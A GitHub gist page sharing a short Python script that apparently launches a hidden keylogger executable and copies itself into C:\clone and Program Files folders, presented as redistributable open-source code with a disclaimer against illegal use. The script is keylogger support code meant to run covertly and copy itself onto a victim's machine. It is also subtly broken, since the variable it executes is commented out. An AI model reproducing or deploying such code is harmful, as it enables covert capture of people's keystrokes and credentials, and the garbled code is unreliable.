Skip to content

Instantly share code, notes, and snippets.

@VosemQ
Last active February 3, 2020 22:15
Show Gist options
  • Save VosemQ/d2b63c741f4871f1b142924a7bd9dd96 to your computer and use it in GitHub Desktop.
Save VosemQ/d2b63c741f4871f1b142924a7bd9dd96 to your computer and use it in GitHub Desktop.
------------------------------------------------------------PLEASE READ THIS------------------------------------------------------------
I got the python from tinkernut and edited it a lot.
I then got the c# from http://null-byte.wonderhowto.com/how-to/create-simple-hidden-console-keylogger-c-sharp-0132757/.
this is open source so you may redistribute it anywhere and edit it how you like.
DO NOT USE IT ILLIGALY. I WILL NOT BE HELD RESPONSIBLE ILLIGAL USE.
from sys import argv
import string
import os
script = argv
name = str(script[0])
#'cmd = 'start keylogger.exe'
os.system(cmd)
os.mkdir('C:\clone')
#os.system(r"copy keylogger.exe C:\clone")
os.system(r"copy " + name + " C:\clone")
os.mkdir('C:\Program Files\clone')
#os.system(r"copy keylogger.exe C:\Program Files\clone")
os.system(r"copy " + name + " C:\Program Files\clone")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment